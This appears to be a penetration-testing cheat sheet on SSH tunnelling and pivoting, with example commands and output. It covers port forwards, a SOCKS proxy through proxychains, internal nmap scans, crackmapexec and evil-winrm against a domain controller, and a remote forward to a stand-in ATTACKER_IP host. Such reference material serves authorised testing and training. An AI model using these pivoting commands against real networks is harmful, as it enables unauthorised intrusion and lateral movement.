SSH TUNNELING
Local port forward
Access internal:80 via your localhost:8080 — Browse internal web apps
ssh -L 8080:INTERNAL_TARGET:80 user@PIVOT_HOST
Example Output
ssh -L 8080:172.16.1.10:80 john@10.10.14.5
Now browse: http://127.0.0.1:8080
(You see internal web app on 172.16.1.10:80)
Remote port forward
Make your port accessible from pivot — Expose your tools to internal net
ssh -R 9090:127.0.0.1:80 user@ATTACKER_IP
Example Output
ssh -R 9090:127.0.0.1:80 attacker@10.10.14.2
On attacker: curl http://127.0.0.1:9090
(Access pivot's localhost:80 from your machine)
Dynamic SOCKS proxy
SOCKS proxy through pivot — Route any tool through pivot
ssh -D 1080 user@PIVOT_HOST
Example Output
ssh -D 1080 john@10.10.14.5
Edit /etc/proxychains4.conf:
socks5 127.0.0.1 1080
proxychains nmap -sT -Pn 172.16.1.10
(Scan internal network through pivot)
Use SOCKS proxy
Prepend proxychains to any command — Edit /etc/proxychains4.conf: socks5 127.0.0.1 1080
proxychains nmap -sT -Pn INTERNAL_TARGET
proxychains crackmapexec smb INTERNAL_TARGET
Example Output
proxychains nmap -sT -Pn 172.16.1.10
ProxyChains | S-chain |->127.0.0.1:1080
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
445/tcp open microsoft-ds
(Scanning internal network through pivot)
SSH with key + tunnel
Multiple port forwards at once — Forward several services
ssh -i id_rsa -L 445:DC_IP:445 -L 5985:DC_IP:5985 user@PIVOT
Example Output
ssh -i id_rsa -L 445:172.16.1.10:445 -L 5985:172.16.1.10:5985 john@10.10.10.5
Now on attacker:
crackmapexec smb 127.0.0.1 -u admin -p Pass
evil-winrm -i 127.0.0.1 -u admin -p Pass
(Multiple internal ports forwarded at once)
Persistent SSH tunnel
Background tunnel — -f background, -N no commands, -T no TTY
ssh -fNT -L 8080:INTERNAL:80 user@PIVOT
Example Output
ssh -fNT -L 8080:172.16.1.10:80 john@10.10.10.5
(Returns to prompt, tunnel runs in background)
curl http://127.0.0.1:8080
(Access internal web app while working)